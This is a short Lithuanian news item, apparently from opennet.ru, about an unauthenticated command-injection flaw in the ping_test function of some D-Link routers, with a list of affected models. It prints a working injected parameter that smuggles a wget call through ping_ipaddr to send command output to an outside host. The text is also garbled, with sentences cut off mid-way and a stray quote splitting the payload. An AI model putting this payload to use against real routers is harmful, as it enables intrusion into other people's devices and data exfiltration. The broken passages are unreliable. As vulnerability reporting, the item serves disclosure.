„D-Link“ belaidžiuose maršrutizatoriuose
Įdomu tai, kad, pasak programinės įrangos kūrėjų, „ping_test“ iškvietimas turėtų būti vykdomas tik po autentifikavimo, tačiau iš tikrųjų jis iškviečiamas bet kokiu atveju, nepriklausomai nuo prisijungimo prie žiniatinklio sąsajos. Visų pirma, kai pasiekiate scenarijų application_sec.cgi ir perduodamas parametras „action=ping_test“, scenarijus nukreipia į autentifikavimo puslapį, tačiau tuo pačiu metu atlieka veiksmą, susijusį su ping_test. Kodui vykdyti, pačiame ping_test buvo panaudotas kitas pažeidžiamumas, kuris iškviečia ping paslaugų programą tinkamai nepatikrinęs, ar testavimui išsiųstas IP adresas yra teisingas. Pavyzdžiui, norėdami iškviesti wget įrankį ir perkelti komandos „echo 1234“ rezultatus į išorinį pagrindinį kompiuterį, tiesiog nurodykite parametrą „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://“. test.test/?$( echo 1234)".
Pažeidžiamumo buvimas oficialiai patvirtintas šiuose modeliuose:
- DIR-655 su 3.02b05 ar senesne programine įranga;
- DIR-866L su 1.03b04 ar senesne programine įranga;
- DIR-1565 su 1.01 ar senesne programine įranga;
- DIR-652 (informacijos apie problemines programinės aparatinės įrangos versijas nepateikiama)
Šių modelių palaikymo laikotarpis jau baigėsi, todėl „D-Link“.
Vėliau buvo nustatyta, kad pažeidžiamumas taip pat buvo
Šaltinis: opennet.ru